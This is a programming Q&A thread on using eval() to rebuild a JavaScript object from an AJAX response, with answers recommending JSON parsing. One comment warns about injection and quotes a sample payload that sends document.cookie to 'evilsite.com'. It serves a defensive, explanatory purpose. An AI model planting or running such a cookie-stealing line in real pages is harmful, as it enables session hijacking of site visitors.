1

Here is the problem string:

$.ajax(......
   ,success:function(msg){
      var obj = eval('['+msg.d+']');
   },
   ....
}

msg.d contains something like:

new Person(2, 'Name Surname','This is just string came from Par'is at Sat'urday');

How can I get past this JavaScript problem?

2
  • 1
    eval() is EVIL. eval() will evaluate EVERYTHING in the string, be it good or not. Depending on where you feed the Person data from, you might end up with a big security issue down the road. If a user manages to sneak something like "new Image().src = 'http://evilsite.com/steal?c=' + document.cookie" as the surname into your database, your page will still run perfectly fine; only 2 things will differ: 1. the Surname will be empty and 2. the login cookie of the visitor will just have been stolen. Please look into JSON so you can safely pass the data to the client without the risks of eval. Commented Oct 19, 2010 at 15:09
  • The Ajax call does not make assumptions about the type of data returned by the server-side script, so msg is only a string, and a string doesn't have a 'd' property. Commented Oct 20, 2010 at 4:33

5 Answers

6

If the string really is as you've quoted it, it has a syntax error and will not work (it has an errant ' inside the word "Saturday"). Otherwise, though, change the brackets ([ and ]) in your eval call to parentheses (( and )):

var obj = eval('('+msg.d+')');

However, it should almost never actually be necessary to do this (or indeed to use eval at all). It's almost always possible, and desirable, to refactor slightly and avoid it.

If that's a literal quote from your code, see also dvhh's answer below: your function argument name (msg.d) is invalid.


1

Using eval in this scenario is actually quite dangerous. You really ought to be using XML or JSON. (That's why they call it AJAX.)

6 Comments

To be clear, the J in AJAX is for JavaScript, not JSON...and a string fits under that category.
@Nick, I was referring to the X. And the J doesn't refer to using Javascript code as a communication medium via eval.
@Eric - JSON doesn't provide a way to pass an executable function either, so what would it directly solve here?
@Nick, There's no mention of passing functions in the message (in the OP). The example is just a simple object, which JSON is well-suited for. If anyone has an urge to pass a function as a message, I would reconsider that, since it is likely a major design flaw.
@Eric - The object could be any of 30 types for example, maybe he gets a Person, or a Class or a Car...you're making some assumptions here that it's an easy thing to bypass :)
1

The function argument should be a valid JavaScript identifier.

Try changing msg.d to msg_d, for example.


1

You may need to escape your string, because this example works fine:

function MyObject(myvar){
    this.hello = function(){
        alert('myvar= ' + myvar);
    };
}

var obj1 = new MyObject('hello');
obj1.hello();

var obj2 = eval("new MyObject('world')"); 
obj2.hello();

(Edit: By the way, I assume msg.d is a typo due to editing the snippet before posting on StackOverflow?)

1 Comment

If you have control over the server side, I would advise using JSON (or XML, but it is slightly slower); that makes things more maintainable and it's easy to use (I assume you use jQuery due to the $.ajax): just change the "dataType" field to 'json' and you directly receive a nice structure in the success handler.
0

I would avoid using eval() for security reasons. If a user can get malicious code into the database, there's a chance it could end up in this eval expression, wreaking havoc for anybody who visits this page.

Instead of using eval, I'd recommend returning JSON from the AJAX request. You can then easily parse the values and build a new Person object with that data.
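
The approach recommended in the answers above (return JSON, parse it, then build the Person from the data), as an added example that is not part of any original answer. The `type` field, the `TYPES` allowlist and the `revive` helper are assumptions made for illustration, and the sample payload is constructed; the allowlist also covers the "could be any of 30 types" case raised in the comments.

```javascript
// Added example: rebuild typed objects from JSON data instead of eval().
function Person(id, name, note) {
  this.id = id;
  this.name = name;
  this.note = note;
}

// Allowlist of constructors the client is willing to build (hypothetical registry).
// Each entry lists the expected fields, in constructor order, with their types.
const TYPES = {
  Person: {
    ctor: Person,
    fields: [['id', 'number'], ['name', 'string'], ['note', 'string']],
  },
};

function revive(jsonText) {
  // JSON.parse accepts data only; anything that is code throws SyntaxError.
  const data = JSON.parse(jsonText);
  const items = Array.isArray(data) ? data : [data];
  return items.map((item) => {
    if (item === null || typeof item !== 'object') {
      throw new TypeError('expected an object');
    }
    // Own-property lookup so names like "constructor" never match.
    const known = Object.prototype.hasOwnProperty.call(TYPES, item.type);
    if (!known) throw new TypeError('unknown type: ' + String(item.type));
    const spec = TYPES[item.type];
    const args = spec.fields.map(([key, kind]) => {
      if (typeof item[key] !== kind) {
        throw new TypeError(item.type + '.' + key + ' must be a ' + kind);
      }
      return item[key];
    });
    return new spec.ctor(...args);
  });
}

// Constructed sample payload, as a server-side JSON encoder would emit it.
// The apostrophes that broke the eval() version are ordinary string content here.
const SAMPLE = JSON.stringify([
  { type: 'Person', id: 2, name: 'Name Surname',
    note: "This is just string came from Par'is at Sat'urday" },
]);
```

With jQuery, setting `dataType: 'json'` makes the success handler receive the already-parsed structure, so only the allowlist and field checks would be needed.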
